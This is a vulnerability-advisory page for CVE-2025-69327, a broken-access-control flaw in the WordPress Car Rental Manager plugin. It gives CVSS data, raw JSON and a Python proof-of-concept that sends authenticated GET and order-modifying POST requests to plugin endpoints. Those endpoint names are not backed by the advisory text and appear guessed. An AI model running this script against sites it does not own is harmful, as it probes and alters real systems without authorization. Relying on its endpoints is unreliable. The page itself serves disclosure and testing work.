Security Vulnerability Report
中文
CVE-2025-69327 CVSS 4.3 MEDIUM

CVE-2025-69327

Published: 2026-01-06 17:15:46
Last Modified: 2026-04-27 21:16:24

Description

Missing Authorization vulnerability in magepeopleteam Car Rental Manager car-rental-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Car Rental Manager: from n/a through <= 1.0.9.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

magepeopleteam Car Rental Manager <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69327 PoC - WordPress Car Rental Manager Broken Access Control # This PoC demonstrates the missing authorization vulnerability import requests import sys from urllib.parse import urljoin def exploit_cve_2025_69327(target_url, auth_cookie=None): """ Exploit for CVE-2025-69327: Missing Authorization in Car Rental Manager plugin Prerequisites: Valid WordPress account (subscriber role or higher) """ # Define vulnerable endpoints endpoints = [ '/wp-json/car-rental-manager/v1/orders', '/wp-json/car-rental-manager/v1/vehicles', '/wp-admin/admin-ajax.php?action=crm_get_orders', '/wp-admin/admin-ajax.php?action=crm_manage_vehicle' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } if auth_cookie: headers['Cookie'] = auth_cookie print(f'[*] Target: {target_url}') print(f'[*] Testing endpoints for missing authorization...') for endpoint in endpoints: full_url = urljoin(target_url, endpoint) # Test GET request try: response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f'[+] VULNERABLE: {endpoint} - Status: {response.status_code}') print(f' Response: {response.text[:200]}...') except Exception as e: print(f'[-] Error testing {endpoint}: {e}') # Test POST request with crafted data try: post_data = { 'order_id': 1, 'action': 'modify', 'data': 'test' } response = requests.post(full_url, json=post_data, headers=headers, timeout=10) if response.status_code in [200, 201]: print(f'[+] POTENTIALLY VULNERABLE: POST {endpoint}') except Exception as e: print(f'[-] Error in POST test: {e}') print('[*] Scan complete. If vulnerabilities found, plugin needs update.') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-69327.py <target_url> [auth_cookie]') print('Example: python cve-2025-69327.py http://example.com "wordpress_logged_in=xxx"') sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] if len(sys.argv) > 2 else None exploit_cve_2025_69327(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69327", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:45.813", "lastModified": "2026-04-27T21:16:24.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in magepeopleteam Car Rental Manager car-rental-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Car Rental Manager: from n/a through <= 1.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/car-rental-manager/vulnerability/wordpress-car-rental-manager-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}